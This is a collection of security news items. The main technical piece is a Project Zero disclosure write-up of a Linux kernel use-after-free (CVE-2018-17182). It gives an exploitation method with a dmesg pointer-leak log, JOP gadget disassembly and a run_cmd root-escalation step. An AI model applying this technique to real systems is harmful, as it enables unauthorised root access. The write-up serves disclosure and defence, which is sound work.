Similarly, if an employee navigates to a known malicious site, the web security service sends a trigger, and the web security refresher runs for that employee. The key is to make sure the interruption is both contextual and quick. The employee did this, so they need training immediately. Even a short delay will reduce the training’s effectiveness.

Additionally, you’ll be running ongoing training and simulations with employees. You’ll perform some analysis to pinpoint the employees who can’t seem to stop clicking things. These employees can get more intensive training, and escalation if they continue to violate corporate policies and put data at risk.

Overhaul Onboarding

After initial triage and integration with your security controls, you’ll work with HR to overhaul the training delivered during their onboarding process. You are now training employees continuously, so you don’t need to spend 3 hours teaching them about phishing and the hazards of clicking links.

Then onboarding can shift, to focus on establishing a culture of security from Day 1. This entails educating new employees on online and technology policies, and acceptable use expectations. You also have an opportunity to set expectations for security awareness training. Make clear that employees will be tested on an ongoing basis, and inform them who sees the results (their managers, etc.), along with the consequences of violating acceptable use policies.

Again, a fine line exists between being draconian and setting clear expectations. If the consequences have teeth (as they should), employees must know, and sign off on their understanding. We also recommend you test each new employee within a month of their start date to ensure they comprehend security expectations and retained their initial lessons.

Start a Competition

Once your program settles in over six months or so, it’s time to shake things up again. You can set up a competition, inviting the company to compete for the Chairperson’s Security Prize. Yes, you need to get the Chairperson on board for this, but that’s usually pretty easy because it helps the company. The prize needs to be impactful, and more than bragging rights. Maybe you can offer the winning department an extra day of holiday for the year. And a huge trophy. Teams love to compete for trophies they can display prominently in their area.

You’ll set the ground rules, including an internal red team and hunting team attacking each group. You’ll be tracking how many employees fall for the attacks and how many report the issues. Your teams can try physically breaching the facilities as well. You want the attacks to dovetail with ongoing security training and testing initiatives to reinforce security culture.

Run Another Simulation

You’ll also want to stage a widespread simulation a few months after the initial foray. Yes, you’ll be continuously testing employees as part of your continuous program. But getting a sense of company-wide results is also helpful. You should compare results from the initial test against the new results. Are fewer employees falling for the ruse? Are more reporting spammy and phishing emails to the central group? Ensuring the trend lines are moving in the right direction boosts the program and helps justify ongoing investment. You feed the results into the team scoring of the competition.

Lather, Rinse, Repeat

At some point, when another high-profile issue presents itself, you should take a similar approach. Let’s say your organization does a lot of business in Europe, so GDPR presents significant risk. You’ll want to train employees on how you define customer data and how to handle it.

Next determine whether you need special training for this issue, or whether you can integrate it into your more extensive bi-annual training for all employees. Every six months all employees sit for perhaps an hour, watching an update on both new hacker tactics and changes to corporate security policies.

Once that round of training completes, you will roll out new tests to highlight how customer data could be lost or stolen. Factor the new tests into your next competition as well, to keep focus on the changing nature of security and the ongoing contest.

Sustaining Impact

Once your program is humming along, we suggest you pick a new high priority topic every six months to make that the focus of your semi-annual scheduled training. As part of addressing this new topic, you’ll integrate with the relevant controls to enable ongoing contextual training and perform an initial test (to establish a baseline), and then track improvement over time.

You’ll also want a more comprehensive set of reports to track the effectiveness of your awareness training; deliver this information to senior management, and perhaps the audit committee. Maybe each quarter you’ll report on how much contextual training employees received, and how much or little they repeated mistakes after training. You’ll also want to report on the overall number of successful attacks, alongside trends of which attacks worked and which got blocked. Being able to map those results back to training topics makes an excellent case for ongoing investment.

At some point the competition will end and you’ll crown the winner. We suggest making a big deal of the winning team. Maybe you can record the award ceremony with the chairperson and memorialize their victory in the company newsletter. You want to make sure all employees understand security is essential and visible at the highest echelons of your organization.

It’s a journey, not a destination, so ensure consistency in your program. Add new focus topics to extend your employee knowledge, keep your content current and interesting, and hold your employees to a high standard – make sure they understand expectations and the consequences of violating corporate policies. Building a security culture requires patience, persistence, and accountability. Anchoring your security awareness training program with continuous, contextual content will go a long way to establishing such a security culture.

With that we wrap up this series on Making an Impact with Security Awareness Training. Thanks again to Mimecast for licensing this content, and we’ll have the assembled and edited paper available in our Research Library within a couple weeks.

- Mike Rothman (0) Comments Subscribe to our daily email digest

Do You Suffer From Breach Optimism Bias?

If you’ve been in the information security field for at least a year, you’ve undoubtedly heard your organization defend the lack of investment in, change to or optimization of a cybersecurity policy, mitigating control or organizational belief. This “It hasn’t happened to us so it likely won’t happen” mentality is called optimism bias, and it’s an issue in our field that predates the field itself.

Read my full article over at

Uber Settles with 50 State Attorneys General for $148 Million In Connection with 2016 Data Breach

On September 26, 2018, Uber Technologies Inc. (“Uber”) agreed to a settlement (the “Settlement”) with all 50 U.S. state attorneys general (the “Attorneys General”) in connection with a 2016 data breach affecting the personal information (including driver’s license numbers) of approximately 607,000 Uber drivers nationwide, as well as approximately 57 million consumers’ email addresses and phone numbers. The Attorneys General alleged that after Uber learned of the breach, which occurred in November 2016, the company paid intruders a $100,000 ransom to delete the data. The Attorneys General alleged that Uber failed to promptly notify affected individuals of the incident, as required under various state laws, instead notifying affected customers and drivers of the breach one year later in November 2017. 

As reported by the Pennsylvania Office of the Attorney General, the Settlement will require Uber to pay $148 million to the Attorneys General, which will be divided among the 50 states. In addition, Uber must undertake certain data security measures, including:

  • comply with applicable breach notification and consumer protection laws regarding protecting personal information;
  • implement measures to protect user data stored on third-party platforms;
  • implement stricter internal password policies for employee access to Uber’s network;
  • develop and implement an overall data security policy to address the collection and protection of personal information, including assessing potential data security risks;
  • implement additional data security measures with respect to personal information stored on Uber’s network;
  • implement a corporate integrity program to ensure appropriate reporting channels for internal ethics concerns or complaints; and
  • engage a third-party expert to conduct regular assessments of Uber’s data security efforts and make recommendations for improvement, as appropriate.

The Settlement is pending court approval. In a statement, California Attorney General Xavier Becerra said, “Uber’s decision to cover up this breach was a blatant violation of the public’s trust. The company failed to safeguard user data and notify authorities when it was exposed. Consistent with its corporate culture at the time, Uber swept the breach under the rug in deliberate disregard of the law.”

We previously reported that the Federal Trade Commission modified a 2017 settlement with Uber after learning of the company’s response to the 2016 breach.

Update: In addition, as reported by Law360, on November 27, 2018, Uber was fined by both the UK Information Commissioner’s Office (“ICO”) and the Dutch Data Protection Authority (“DPA”). The ICO’s fine of £385,000 was a result of Uber’s failure to protect its customers’ personal information. The Dutch DPA fined Uber €600,000 “for violating the Dutch data breach regulation,” which requires notification of the breach within 72 hours.

F-Secure Freedome review: A VPN with some built-in antivirus features

F-Secure Freedome in brief:

  • P2P allowed: No
  • Business location: Finland
  • Number of servers:  N/A
  • Number of country locations: 22
  • Cost: $50-$80 per year
  • VPN protocol: OpenVPN
  • Data encryption: AES 128-bit
  • Data authentication: AES 128-bit
  • Handshake encryption: 2048-bit RSA keys with SHA-256 certificates

There are a few VPN services that offer their own antivirus, one is Avira Phantom VPN Pro, which we looked at previously; Finland-based F-Secure is another. The company’s Freedome VPN is a premium service that offers 22 country locations around the world and extra freebies like tracker and malicious-site blocking.

To read this article in full, please click here

Extreme Ownership – Enterprise Security Weekly #108

This week, Paul and Matt Alderman talk about Threat and Vulnerability management, and how Cloud and Application security's impact on vendors can help with integration in the Enterprise! In the Enterprise News this week, Bomgar to be renamed BeyondTrust after acquisition, Attivo brings cyber security deception to containers and serverless, Symantec extends data loss prevention platform with DRM, ExtraHop announces the availability of Reveal(x) for Azure, and Cloud Native applications are at risk from Zero Touch attacks! All that and more on this episode of Enterprise Security Weekly!


Full Show Notes:


Visit for all the latest episodes!


Visit https://www.activecountermeasures/esw to sign up for a demo or buy our AI Hunter!


→Visit our website:

→Follow us on Twitter:

→Like us on Facebook:

Cybercriminals Increasingly Trying to Ensnare the Big Financial Fish

Threat groups such as GOLD KINGSWOOD are using their extensive resources and network insights to target high-value financial organizations around the world.


CTU Research

Threat groups such as GOLD KINGSWOOD are using their extensive resources and network insights to target high-value financial organizations around the world.

A cache invalidation bug in Linux memory management

Posted by Jann Horn, Google Project Zero

This blogpost describes a way to exploit a Linux kernel bug (CVE-2018-17182) that exists since kernel version 3.16. While the bug itself is in code that is reachable even from relatively strongly sandboxed contexts, this blogpost only describes a way to exploit it in environments that use Linux kernels that haven't been configured for increased security (specifically, Ubuntu 18.04 with kernel linux-image-4.15.0-34-generic at version 4.15.0-34.37). This demonstrates how the kernel configuration can have a big impact on the difficulty of exploiting a kernel bug.

The bug report and the exploit are filed in our issue tracker as issue 1664.

Fixes for the issue are in the upstream stable releases 4.18.9, 4.14.71, 4.9.128, 4.4.157 and 3.16.58.

The bug

Whenever a userspace page fault occurs because e.g. a page has to be paged in on demand, the Linux kernel has to look up the VMA (virtual memory area; struct vm_area_struct) that contains the fault address to figure out how the fault should be handled. The slowpath for looking up a VMA (in find_vma()) has to walk a red-black tree of VMAs. To avoid this performance hit, Linux also has a fastpath that can bypass the tree walk if the VMA was recently used.

The implementation of the fastpath has changed over time; since version 3.15, Linux uses per-thread VMA caches with four slots, implemented in mm/vmacache.c and include/linux/vmacache.h. Whenever a successful lookup has been performed through the slowpath, vmacache_update() stores a pointer to the VMA in an entry of the array current->vmacache.vmas, allowing the next lookup to use the fastpath.

Note that VMA caches are per-thread, but VMAs are associated with a whole process (more precisely with a struct mm_struct; from now on, this distinction will largely be ignored, since it isn't relevant to this bug). Therefore, when a VMA is freed, the VMA caches of all threads must be invalidated - otherwise, the next VMA lookup would follow a dangling pointer. However, since a process can have many threads, simply iterating through the VMA caches of all threads would be a performance problem.

To solve this, both the struct mm_struct and the per-thread struct vmacache are tagged with sequence numbers; when the VMA lookup fastpath discovers in vmacache_valid() that current->vmacache.seqnum and current->mm->vmacache_seqnum don't match, it wipes the contents of the current thread's VMA cache and updates its sequence number.

The sequence numbers of the mm_struct and the VMA cache were only 32 bits wide, meaning that it was possible for them to overflow. To ensure that a VMA cache can't incorrectly appear to be valid when current->mm->vmacache_seqnum has actually been incremented 232 times, vmacache_invalidate() (the helper that increments current->mm->vmacache_seqnum) had a special case: When current->mm->vmacache_seqnum wrapped to zero, it would call vmacache_flush_all() to wipe the contents of all VMA caches associated with current->mm. Executing vmacache_flush_all() was very expensive: It would iterate over every thread on the entire machine, check which struct mm_struct it is associated with, then if necessary flush the thread's VMA cache.

In version 3.16, an optimization was added: If the struct mm_struct was only associated with a single thread, vmacache_flush_all() would do nothing, based on the realization that every VMA cache invalidation is preceded by a VMA lookup; therefore, in a single-threaded process, the VMA cache's sequence number is always close to the mm_struct's sequence number:

* Single threaded tasks need not iterate the entire
* list of process. We can avoid the flushing as well
* since the mm's seqnum was increased and don't have
* to worry about other threads' seqnum. Current's
* flush will occur upon the next lookup.
if (atomic_read(&mm->mm_users) == 1)

However, this optimization is incorrect because it doesn't take into account what happens if a previously single-threaded process creates a new thread immediately after the mm_struct's sequence number has wrapped around to zero. In this case, the sequence number of the first thread's VMA cache will still be 0xffffffff, and the second thread can drive the mm_struct's sequence number up to 0xffffffff again. At that point, the first thread's VMA cache, which can contain dangling pointers, will be considered valid again, permitting the use of freed VMA pointers in the first thread's VMA cache.

The bug was fixed by changing the sequence numbers to 64 bits, thereby making an overflow infeasible, and removing the overflow handling logic.

Reachability and Impact

Fundamentally, this bug can be triggered by any process that can run for a sufficiently long time to overflow the reference counter (about an hour if MAP_FIXED is usable) and has the ability to use mmap()/munmap() (to manage memory mappings) and clone() (to create a thread). These syscalls do not require any privileges, and they are often permitted even in seccomp-sandboxed contexts, such as the Chrome renderer sandbox (mmap, munmap, clone), the sandbox of the main gVisor host component, and Docker's seccomp policy.

To make things easy, my exploit uses various other kernel interfaces, and therefore doesn't just work from inside such sandboxes; in particular, it uses /dev/kmsg to read dmesg logs and uses an eBPF array to spam the kernel's page allocator with user-controlled, mutable single-page allocations. However, an attacker willing to invest more time into an exploit would probably be able to avoid using such interfaces.

Interestingly, it looks like Docker in its default config doesn't prevent containers from accessing the host's dmesg logs if the kernel permits dmesg access for normal users - while /dev/kmsg doesn't exist in the container, the seccomp policy whitelists the syslog() syscall for some reason.

BUG_ON(), WARN_ON_ONCE(), and dmesg

The function in which the first use-after-free access occurs is vmacache_find(). When this function was first added - before the bug was introduced -, it accessed the VMA cache as follows:

      for (i = 0; i < VMACACHE_SIZE; i++) {
              struct vm_area_struct *vma = current->vmacache[i];

              if (vma && vma->vm_start <= addr && vma->vm_end > addr) {
                      BUG_ON(vma->vm_mm != mm);
                      return vma;

When this code encountered a cached VMA whose bounds contain the supplied address addr, it checked whether the VMA's ->vm_mm pointer matches the expected mm_struct - which should always be the case, unless a memory safety problem has happened -, and if not, terminated with a BUG_ON() assertion failure. BUG_ON() is intended to handle cases in which a kernel thread detects a severe problem that can't be cleanly handled by bailing out of the current context. In a default upstream kernel configuration, BUG_ON() will normally print a backtrace with register dumps to the dmesg log buffer, then forcibly terminate the current thread. This can sometimes prevent the rest of the system from continuing to work properly - for example, if the crashing code held an important lock, any other thread that attempts to take that lock will then deadlock -, but it is often successful in keeping the rest of the system in a reasonably usable state. Only when the kernel detects that the crash is in a critical context such as an interrupt handler, it brings down the whole system with a kernel panic.

The same handler code is used for dealing with unexpected crashes in kernel code, like page faults and general protection faults at non-whitelisted addresses: By default, if possible, the kernel will attempt to terminate only the offending thread.

The handling of kernel crashes is a tradeoff between availability, reliability and security. A system owner might want a system to keep running as long as possible, even if parts of the system are crashing, if a sudden kernel panic would cause data loss or downtime of an important service. Similarly, a system owner might want to debug a kernel bug on a live system, without an external debugger; if the whole system terminated as soon as the bug is triggered, it might be harder to debug an issue properly.
On the other hand, an attacker attempting to exploit a kernel bug might benefit from the ability to retry an attack multiple times without triggering system reboots; and an attacker with the ability to read the crash log produced by the first attempt might even be able to use that information for a more sophisticated second attempt.

The kernel provides two sysctls that can be used to adjust this behavior, depending on the desired tradeoff:

  • kernel.panic_on_oops will automatically cause a kernel panic when a BUG_ON() assertion triggers or the kernel crashes; its initial value can be configured using the build configuration variable CONFIG_PANIC_ON_OOPS. It is off by default in the upstream kernel - and enabling it by default in distributions would probably be a bad idea -, but it is e.g. enabled by Android.
  • kernel.dmesg_restrict controls whether non-root users can access dmesg logs, which, among other things, contain register dumps and stack traces for kernel crashes; its initial value can be configured using the build configuration variable CONFIG_SECURITY_DMESG_RESTRICT. It is off by default in the upstream kernel, but is enabled by some distributions, e.g. Debian. (Android relies on SELinux to block access to dmesg.)

Ubuntu, for example, enables neither of these.

The code snippet from above was amended in the same month as it was committed:

      for (i = 0; i < VMACACHE_SIZE; i++) {
               struct vm_area_struct *vma = current->vmacache[i];
-               if (vma && vma->vm_start <= addr && vma->vm_end > addr) {
-                       BUG_ON(vma->vm_mm != mm);
+               if (!vma)
+                       continue;
+               if (WARN_ON_ONCE(vma->vm_mm != mm))
+                       break;
+               if (vma->vm_start <= addr && vma->vm_end > addr)
                       return vma;
-               }

This amended code is what distributions like Ubuntu are currently shipping.

The first change here is that the sanity check for a dangling pointer happens before the address comparison. The second change is somewhat more interesting: BUG_ON() is replaced with WARN_ON_ONCE().

WARN_ON_ONCE() prints debug information to dmesg that is similar to what BUG_ON() would print. The differences to BUG_ON() are that WARN_ON_ONCE() only prints debug information the first time it triggers, and that execution continues: Now when the kernel detects a dangling pointer in the VMA cache lookup fastpath - in other words, when it heuristically detects that a use-after-free has happened -, it just bails out of the fastpath and falls back to the red-black tree walk. The process continues normally.

This fits in with the kernel's policy of attempting to keep the system running as much as possible by default; if an accidental use-after-free bug occurs here for some reason, the kernel can probably heuristically mitigate its effects and keep the process working.

The policy of only printing a warning even when the kernel has discovered a memory corruption is problematic for systems that should kernel panic when the kernel notices security-relevant events like kernel memory corruption. Simply making WARN() trigger kernel panics isn't really an option because WARN() is also used for various events that are not important to the kernel's security. For this reason, a few uses of WARN_ON() in security-relevant places have been replaced with CHECK_DATA_CORRUPTION(), which permits toggling the behavior between BUG() and WARN() at kernel configuration time. However, CHECK_DATA_CORRUPTION() is only used in the linked list manipulation code and in addr_limit_user_check(); the check in the VMA cache, for example, still uses a classic WARN_ON_ONCE().

A third important change was made to this function; however, this change is relatively recent and will first be in the 4.19 kernel, which hasn't been released yet, so it is irrelevant for attacking currently deployed kernels.

      for (i = 0; i < VMACACHE_SIZE; i++) {
-               struct vm_area_struct *vma = current->vmacache.vmas[i];
+               struct vm_area_struct *vma = current->vmacache.vmas[idx];
-               if (!vma)
-                       continue;
-               if (WARN_ON_ONCE(vma->vm_mm != mm))
-                       break;
-               if (vma->vm_start <= addr && vma->vm_end > addr) {
-                       count_vm_vmacache_event(VMACACHE_FIND_HITS);
-                       return vma;
+               if (vma) {
+                       if (WARN_ON_ONCE(vma->vm_mm != mm))
+                               break;
+                       if (vma->vm_start <= addr && vma->vm_end > addr) {
+                               count_vm_vmacache_event(VMACACHE_FIND_HITS);
+                               return vma;
+                       }
+               if (++idx == VMACACHE_SIZE)
+                       idx = 0;

After this change, the sanity check is skipped altogether unless the kernel is built with the debugging option CONFIG_DEBUG_VM_VMACACHE.

The exploit: Incrementing the sequence number

The exploit has to increment the sequence number roughly 233 times. Therefore, the efficiency of the primitive used to increment the sequence number is important for the runtime of the whole exploit.

It is possible to cause two sequence number increments per syscall as follows: Create an anonymous VMA that spans three pages. Then repeatedly use mmap() with MAP_FIXED to replace the middle page with an equivalent VMA. This causes mmap() to first split the VMA into three VMAs, then replace the middle VMA, and then merge the three VMAs together again, causing VMA cache invalidations for the two VMAs that are deleted while merging the VMAs.

The exploit: Replacing the VMA

Enumerating all potential ways to attack the use-after-free without releasing the slab's backing page (according to /proc/slabinfo, the Ubuntu kernel uses one page per vm_area_struct slab) back to the buddy allocator / page allocator:

  1. Get the vm_area_struct reused in the same process. The process would then be able to use this VMA, but this doesn't result in anything interesting, since the VMA caches of the process would be allowed to contain pointers to the VMA anyway.
  2. Free the vm_area_struct such that it is on the slab allocator's freelist, then attempt to access it. However, at least the SLUB allocator that Ubuntu uses replaces the first 8 bytes of the vm_area_struct (which contain vm_start, the userspace start address) with a kernel address. This makes it impossible for the VMA cache lookup function to return it, since the condition vma->vm_start <= addr && vma->vm_end > addr can't be fulfilled, and therefore nothing interesting happens.
  3. Free the vm_area_struct such that it is on the slab allocator's freelist, then allocate it in another process. This would (with the exception of a very narrow race condition that can't easily be triggered repeatedly) result in hitting the WARN_ON_ONCE(), and therefore the VMA cache lookup function wouldn't return the VMA.
  4. Free the vm_area_struct such that it is on the slab allocator's freelist, then make an allocation from a slab that has been merged with the vm_area_struct slab. This requires the existence of an aliasing slab; in a Ubuntu 18.04 VM, no such slab seems to exist.

Therefore, to exploit this bug, it is necessary to release the backing page back to the page allocator, then reallocate the page in some way that permits placing controlled data in it. There are various kernel interfaces that could be used for this; for example:

pipe pages:
  • advantage: not wiped on allocation
  • advantage: permits writing at an arbitrary in-page offset if splice() is available
  • advantage: page-aligned
  • disadvantage: can't do multiple writes without first freeing the page, then reallocating it

BPF maps:
  • advantage: can repeatedly read and write contents from userspace
  • advantage: page-aligned
  • disadvantage: wiped on allocation

This exploit uses BPF maps.

The exploit: Leaking pointers from dmesg

The exploit wants to have the following information:

  • address of the mm_struct
  • address of the use-after-free'd VMA
  • load address of kernel code

At least in the Ubuntu 18.04 kernel, the first two of these are directly visible in the register dump triggered by WARN_ON_ONCE(), and can therefore easily be extracted from dmesg: The mm_struct's address is in RDI, and the VMA's address is in RAX. However, an instruction pointer is not directly visible because RIP and the stack are symbolized, and none of the general-purpose registers contain an instruction pointer.

A kernel backtrace can contain multiple sets of registers: When the stack backtracing logic encounters an interrupt frame, it generates another register dump. Since we can trigger the WARN_ON_ONCE() through a page fault on a userspace address, and page faults on userspace addresses can happen at any userspace memory access in syscall context (via copy_from_user()/copy_to_user()/...), we can pick a call site that has the relevant information in a register from a wide range of choices. It turns out that writing to an eventfd triggers a usercopy while R8 still contains the pointer to the eventfd_fops structure.

When the exploit runs, it replaces the VMA with zeroed memory, then triggers a VMA lookup against the broken VMA cache, intentionally triggering the WARN_ON_ONCE(). This generates a warning that looks as follows - the leaks used by the exploit are highlighted:

[ 3482.271265] WARNING: CPU: 0 PID: 1871 at /build/linux-SlLHxe/linux-4.15.0/mm/vmacache.c:102 vmacache_find+0x9c/0xb0
[ 3482.271298] RIP: 0010:vmacache_find+0x9c/0xb0
[ 3482.271299] RSP: 0018:ffff9e0bc2263c60 EFLAGS: 00010203
[ 3482.271300] RAX: ffff8c7caf1d61a0 RBX: 00007fffffffd000 RCX: 0000000000000002
[ 3482.271301] RDX: 0000000000000002 RSI: 00007fffffffd000 RDI: ffff8c7c214c7380
[ 3482.271301] RBP: ffff9e0bc2263c60 R08: 0000000000000000 R09: 0000000000000000
[ 3482.271302] R10: 0000000000000000 R11: 0000000000000000 R12: ffff8c7c214c7380
[ 3482.271303] R13: ffff9e0bc2263d58 R14: ffff8c7c214c7380 R15: 0000000000000014
[ 3482.271304] FS:  00007f58c7bf6a80(0000) GS:ffff8c7cbfc00000(0000) knlGS:0000000000000000
[ 3482.271305] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 3482.271305] CR2: 00007fffffffd000 CR3: 00000000a143c004 CR4: 00000000003606f0
[ 3482.271308] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[ 3482.271309] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[ 3482.271309] Call Trace:
[ 3482.271314]  find_vma+0x1b/0x70
[ 3482.271318]  __do_page_fault+0x174/0x4d0
[ 3482.271320]  do_page_fault+0x2e/0xe0
[ 3482.271323]  do_async_page_fault+0x51/0x80
[ 3482.271326]  async_page_fault+0x25/0x50
[ 3482.271329] RIP: 0010:copy_user_generic_unrolled+0x86/0xc0
[ 3482.271330] RSP: 0018:ffff9e0bc2263e08 EFLAGS: 00050202
[ 3482.271330] RAX: 00007fffffffd008 RBX: 0000000000000008 RCX: 0000000000000001
[ 3482.271331] RDX: 0000000000000000 RSI: 00007fffffffd000 RDI: ffff9e0bc2263e30
[ 3482.271332] RBP: ffff9e0bc2263e20 R08: ffffffffa7243680 R09: 0000000000000002
[ 3482.271333] R10: ffff8c7bb4497738 R11: 0000000000000000 R12: ffff9e0bc2263e30
[ 3482.271333] R13: ffff8c7bb4497700 R14: ffff8c7cb7a72d80 R15: ffff8c7bb4497700
[ 3482.271337]  ? _copy_from_user+0x3e/0x60
[ 3482.271340]  eventfd_write+0x74/0x270
[ 3482.271343]  ? common_file_perm+0x58/0x160
[ 3482.271345]  ? wake_up_q+0x80/0x80
[ 3482.271347]  __vfs_write+0x1b/0x40
[ 3482.271348]  vfs_write+0xb1/0x1a0
[ 3482.271349]  SyS_write+0x55/0xc0
[ 3482.271353]  do_syscall_64+0x73/0x130
[ 3482.271355]  entry_SYSCALL_64_after_hwframe+0x3d/0xa2
[ 3482.271356] RIP: 0033:0x55a2e8ed76a6
[ 3482.271357] RSP: 002b:00007ffe71367ec8 EFLAGS: 00000202 ORIG_RAX: 0000000000000001
[ 3482.271358] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 000055a2e8ed76a6
[ 3482.271358] RDX: 0000000000000008 RSI: 00007fffffffd000 RDI: 0000000000000003
[ 3482.271359] RBP: 0000000000000001 R08: 0000000000000000 R09: 0000000000000000
[ 3482.271359] R10: 0000000000000000 R11: 0000000000000202 R12: 00007ffe71367ec8
[ 3482.271360] R13: 00007fffffffd000 R14: 0000000000000009 R15: 0000000000000000
[ 3482.271361] Code: 00 48 8b 84 c8 10 08 00 00 48 85 c0 74 11 48 39 78 40 75 17 48 39 30 77 06 48 39 70 08 77 8d 83 c2 01 83 fa 04 75 ce 31 c0 5d c3 <0f> 0b 31 c0 5d c3 90 90 90 90 90 90 90 90 90 90 90 90 90 90 0f
[ 3482.271381] ---[ end trace bf256b6e27ee4552 ]---

At this point, the exploit can create a fake VMA that contains the correct mm_struct pointer (leaked from RDI). It also populates other fields with references to fake data structures (by creating pointers back into the fake VMA using the leaked VMA pointer from RAX) and with pointers into the kernel's code (using the leaked R8 from the page fault exception frame to bypass KASLR).

The exploit: JOP (the boring part)

It is probably possible to exploit this bug in some really elegant way by abusing the ability to overlay a fake writable VMA over existing readonly pages, or something like that; however, this exploit just uses classic jump-oriented programming.

To trigger the use-after-free a second time, a writing memory access is performed on an address that has no pagetable entries. At this point, the kernel's page fault handler comes in via page_fault -> do_page_fault -> __do_page_fault -> handle_mm_fault -> __handle_mm_fault -> handle_pte_fault -> do_fault -> do_shared_fault -> __do_fault, at which point it performs an indirect call:

static int __do_fault(struct vm_fault *vmf)
struct vm_area_struct *vma = vmf->vma;
int ret;

ret = vma->vm_ops->fault(vmf);

vma is the VMA structure we control, so at this point, we can gain instruction pointer control. R13 contains a pointer to vma. The JOP chain that is used from there on follows; it is quite crude (for example, it crashes after having done its job), but it works.

First, to move the VMA pointer to RDI:

ffffffff810b5c21: 49 8b 45 70           mov rax,QWORD PTR [r13+0x70]
ffffffff810b5c25: 48 8b 80 88 00 00 00  mov rax,QWORD PTR [rax+0x88]
ffffffff810b5c2c: 48 85 c0              test rax,rax
ffffffff810b5c2f: 74 08                 je ffffffff810b5c39
ffffffff810b5c31: 4c 89 ef              mov rdi,r13
ffffffff810b5c34: e8 c7 d3 b4 00        call ffffffff81c03000 <__x86_indirect_thunk_rax>

Then, to get full control over RDI:

ffffffff810a4aaa: 48 89 fb              mov rbx,rdi
ffffffff810a4aad: 48 8b 43 20           mov rax,QWORD PTR [rbx+0x20]
ffffffff810a4ab1: 48 8b 7f 28           mov rdi,QWORD PTR [rdi+0x28]
ffffffff810a4ab5: e8 46 e5 b5 00        call ffffffff81c03000 <__x86_indirect_thunk_rax>

At this point, we can call into run_cmd(), which spawns a root-privileged usermode helper, using a space-delimited path and argument list as its only argument. This gives us the ability to run a binary we have supplied with root privileges. (Thanks to Mark for pointing out that if you control RDI and RIP, you don't have to try to do crazy things like flipping the SM*P bits in CR4, you can just spawn a usermode helper...)

After launching the usermode helper, the kernel crashes with a page fault because the JOP chain doesn't cleanly terminate; however, since that only kills the process in whose context the fault occured, it doesn't really matter.

Fix timeline

This bug was reported 2018-09-12. Two days later, 2018-09-14, a fix was in the upstream kernel tree. This is exceptionally fast, compared to the fix times of other software vendors. At this point, downstream vendors could theoretically backport and apply the patch. The bug is essentially public at this point, even if its security impact is obfuscated by the commit message, which is frequently demonstrated by grsecurity.

However, a fix being in the upstream kernel does not automatically mean that users' systems are actually patched. The normal process for shipping fixes to users who use distribution kernels based on upstream stable branches works roughly as follows:

  1. A patch lands in the upstream kernel.
  2. The patch is backported to an upstream-supported stable kernel.
  3. The distribution merges the changes from upstream-supported stable kernels into its kernels.
  4. Users install the new distribution kernel.

Note that the patch becomes public after step 1, potentially allowing attackers to develop an exploit, but users are only protected after step 4.

In this case, the backport to the upstream-supported stable kernels 4.18, 4.14, 4.9 and 4.4 were published 2018-09-19, five days after the patch became public, at which point the distributions could pull in the patch.

Upstream stable kernel updates are published very frequently. For example, looking at the last few stable releases for the 4.14 stable kernel, which is the newest upstream longterm maintenance release:

4.14.72 on 2018-09-26
4.14.71 on 2018-09-19
4.14.70 on 2018-09-15
4.14.69 on 2018-09-09
4.14.68 on 2018-09-05
4.14.67 on 2018-08-24
4.14.66 on 2018-08-22

The 4.9 and 4.4 longterm maintenance kernels are updated similarly frequently; only the 3.16 longterm maintenance kernel has not received any updates between the most recent update on 2018-09-25 (3.16.58) and the previous one on 2018-06-16 (3.16.57).

However, Linux distributions often don't publish distribution kernel updates very frequently. For example, Debian stable ships a kernel based on 4.9, but as of 2018-09-26, this kernel was last updated 2018-08-21. Similarly, Ubuntu 16.04 ships a kernel that was last updated 2018-08-27. Android only ships security updates once a month. Therefore, when a security-critical fix is available in an upstream stable kernel, it can still take weeks before the fix is actually available to users - especially if the security impact is not announced publicly.

In this case, the security issue was announced on the oss-security mailing list on 2018-09-18, with a CVE allocation on 2018-09-19, making the need to ship new distribution kernels to users clearer. Still: As of 2018-09-26, both Debian and Ubuntu (in releases 16.04 and 18.04) track the bug as unfixed:

Fedora pushed an update to users on 2018-09-22:


This exploit shows how much impact the kernel configuration can have on how easy it is to write an exploit for a kernel bug. While simply turning on every security-related kernel configuration option is probably a bad idea, some of them - like the kernel.dmesg_restrict sysctl - seem to provide a reasonable tradeoff when enabled.

The fix timeline shows that the kernel's approach to handling severe security bugs is very efficient at quickly landing fixes in the git master tree, but leaves a window of exposure between the time an upstream fix is published and the time the fix actually becomes available to users - and this time window is sufficiently large that a kernel exploit could be written by an attacker in the meantime.

New SEI CERT Tool Extracts Artifacts from Free Text for Incident Report Analysis

This post is co-authored with Sam Perl.

The CERT Division of the Software Engineering Institute (SEI) at Carnegie Mellon University recently released the Cyobstract Python library as an open source tool. You can use it to quickly and efficiently extract artifacts from free text in a single report, from a collection of incident reports, from threat assessment summaries, or any other textual source.

Cybersecurity teams need to collect and process data from incident reports, blog posts, news feeds, threat reports, IT tickets, incident tickets, and more. Often incident analysts are looking for technical artifacts to help in their investigation of a threat and development of a mitigation. This activity is often done manually by cutting and pasting between sources and tools. Cyobstract helps extract key artifact values from any kind of text, allowing incident analysts to focus their attention on processing the data once it's extracted. Once artifact values are extracted, they can be more easily correlated across multiple datasets.

After using Cyobstract to extract security-relevant data types, the data can be used for higher level downstream analysis and investigation of source incident reports and data. The resulting data can also be loaded into a database, such as an indicator database. Using Cyobstract, the extracted artifacts can be used to quickly and easily find commonality and similarity across reports, thereby potentially revealing patterns that might otherwise have remained hidden.

At its core, the Cyobstract library is built around a collection of robust regular expressions that target 24 specific security-relevant data types of potential interest, including the following:

  • IP addresses: IPv4, IPv4 CIDR, IPv4 range, IPv6, IPv6 CIDR, and IPv6 range
  • hashes: MD5, SHA1, SHA256, and ssdeep
  • Internet and system-related strings: FQDN, URL, user agent strings, email addresses, filenames, filepath, and registry keys
  • Internet infrastructure values: ASN, ASN owner, country, and ISP
  • security analysis values: CVE, malware, and attack type

Cyobstract is capable of extracting these artifacts even if they are malformed in some way. For example, in the incident response community, it's often standard practice for teams to "defang" indicators of compromise before storing them or sending them to another team. Defanged indicator values can be difficult for automated solutions to extract. There is no standard practice for defanging, so there are many ways it can be done. Cyobstract was built from a large collection of real incident reports from many organizations so it can handle many ways of defanging that CERT researchers have observed in the field.

